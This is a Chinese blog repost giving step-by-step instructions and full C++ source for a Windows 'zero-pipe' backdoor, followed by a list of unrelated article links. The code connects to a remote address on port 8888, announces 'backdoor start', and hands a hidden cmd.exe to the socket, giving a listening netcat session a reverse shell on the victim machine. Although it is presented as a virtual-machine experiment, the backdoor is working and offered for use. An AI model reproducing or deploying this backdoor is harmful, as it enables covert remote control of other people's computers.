零管道返回cmdshell
来源:互联网 发布:淘宝h5页面用户 编辑:程序博客网 时间:2024/04/30 13:26
零管道返回cmdshell
192.168.139.128为虚拟机的IP地址。
实验步骤:
1 在虚拟机中开启nc -l -v -p 8888进行监听
2. 运行编译好的程序
虚拟机就会得到实体机的cmd了....
// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include <winsock2.h>#pragma comment(lib, "WS2_32.lib")// 链接到WS2_32.libvoid cmdshell(SOCKET s){char szSysDir[MAX_PATH] = {0};GetSystemDirectory(szSysDir, MAX_PATH);strcat(szSysDir, "\\cmd.exe");STARTUPINFO si = {0};GetStartupInfo(&si);si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;PROCESS_INFORMATION pi = {0};::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );::WaitForSingleObject(pi.hProcess, INFINITE);}int main(int argc, char* argv[]){char MyMessage[512] = {0};strcpy(MyMessage, "backdoor start");// 初始化WS2_32.dllWSADATA wsaData;WORD sockVersion = MAKEWORD(2, 2);if(::WSAStartup(sockVersion, &wsaData) != 0){return -1;}SOCKETs = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);if (s == INVALID_SOCKET){return -1;}sockaddr_in sin;sin.sin_family = AF_INET;sin.sin_port = htons(8888);sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 ){int nErr = GetLastError();return -1;}if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR){printf("send error");return -1;}cmdshell(s);printf("Hello World!\n");return 0;}
- 零管道返回cmdshell
- 零管道
- 关于cmdshell~~
- 获取管道返回值
- 技术讨论关于零管道CMD后门
- 技术讨论关于零管道CMD后门
- 简易CMDSHELL源码
- Hacking in CMDshell
- CMDSHELL测试API
- 双管道打开cmdshell
- 反向连接打开cmdshell
- 端口重用打开cmdshell
- 使用nc获取cmdshell
- VC利用管道读取EXE返回值
- 一个1KB的零管道后门【代码】
- 零xml配置SpringMVC返回json数据
- 一个简单的CMDSHELL后门
- 一个简单的CMDShell后门
- ServerGuide 引导安装指南 (不配置阵列)
- son_c的一些问题
- 【OpenCV入门指南】第二篇 缩放图像
- Intellij IDEA插件下载地址
- ServU 5.0的配置
- 零管道返回cmdshell
- flex 引用皮肤
- silverlight 实现动画效果
- 【Tech-Android-Other】Android中的内存管理的工具使用方法
- windows下 eclipse+python+django开发环境搭建
- 【OpenCV入门指南】第三篇Canny边缘检测
- 终于在android下面完成了ffmpeg最新版的编译,弱弱的记录
- winform播放音乐
- Linux获得进程号